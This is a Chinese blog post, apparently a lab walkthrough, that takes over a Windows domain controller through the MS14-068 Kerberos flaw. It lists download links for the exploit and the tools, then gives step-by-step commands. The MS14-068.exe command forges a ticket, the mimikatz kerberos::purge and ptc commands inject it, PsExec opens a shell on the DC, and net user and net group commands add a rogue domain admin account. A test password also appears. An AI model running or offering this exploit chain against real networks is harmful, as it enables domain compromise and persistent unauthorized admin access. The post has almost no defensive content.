zoukankan      html  css  js  c++  java
  • 域渗透(三)获取域控MS14-068

    域环境

    域名  ddg.admin.com

    win 2008 DC1   192.168.91.2  默认网关192.168.91.1

    win7    192.168.91.131   默认网关192.168.91.2    win7            1qaz@WSX

    MS14-068

    参考链接:https://www.cnblogs.com/yuzly/p/10859520.html

    https://www.freebuf.com/articles/system/197160.html

    https://blog.csdn.net/qq_43001579/article/details/84964412

    ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

    Ms14-068.exe 下载地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

    PSexec下载地址:https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe

     mimikatz地址 http://blog.gentilkiwi.com/mimikatz

    一、漏洞利用前提

      1.域控没有打MS14-068的补丁

      2.攻击者拿下了一台域内的普通计算机,并获得普通域用户以及密码/hash值,以及用户的suid

    自己本次测试查看域控有没有打MS14-068的补丁(KB3011780补丁),可通过systeminfo来查看

    二、测试

    在win7中测试dir 域控 ,拒绝访问域控的C盘,可以访问同一个域中的win2003的C盘

    进入MS14-068目录

    MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

    -u 域账号+@+域名称,这里是ts1+@+yunying.lab

    -p 为当前用户的密码,即ts1的密码

    -s为ts1的SID值,可以通过whoami /all来获取用户的SID值

    -d为当前域的域控

     

     会在当前的目录下生成一个ccache的文件

    进入mimikatz

    mimikatz # kerberos::purge          //清空当前凭证
    mimikatz # kerberos::list           //查看当前机器凭证
    mimikatz # kerberos::ptc 票据文件    //将上一步生成的票据注入到内存中

    之后输入命令 dir \域控\c$     //这里的域控地址最好和上面的 ms14-068 -d 的域控地址相同,包括大小写,不同的话可能不能访问

    win7可以成功查看域控win2008的C盘

    使用PSTools目录下的PsExec.exe获取shell:

    PsExec64.exe  域控地址  cmd.exe

     添加域管理员用户

    net user ms14-068 1qaz@WSX /add /domain
    
    net group "domain admins" ms14-068 /add /domain

    这个貌似也是有时间限制的,有有效期,过一会 指定网络名就不再可用

    finished

  • 相关阅读:
    SEO优化范列20120215
    IIS中的上传目录权限设置问题
    c# webservice接口 输出xml
    360浏览器用window.open的话,session会丢失
    iis网站安全设置
    SEO优化20120215
    IIS6.0安全设置方法 .
    优化20120215
    WIN2003的安全设置
    webservice 生成dll的方法
  • 原文地址:https://www.cnblogs.com/liqik/p/13181400.html
Copyright © 2011-2022 走看看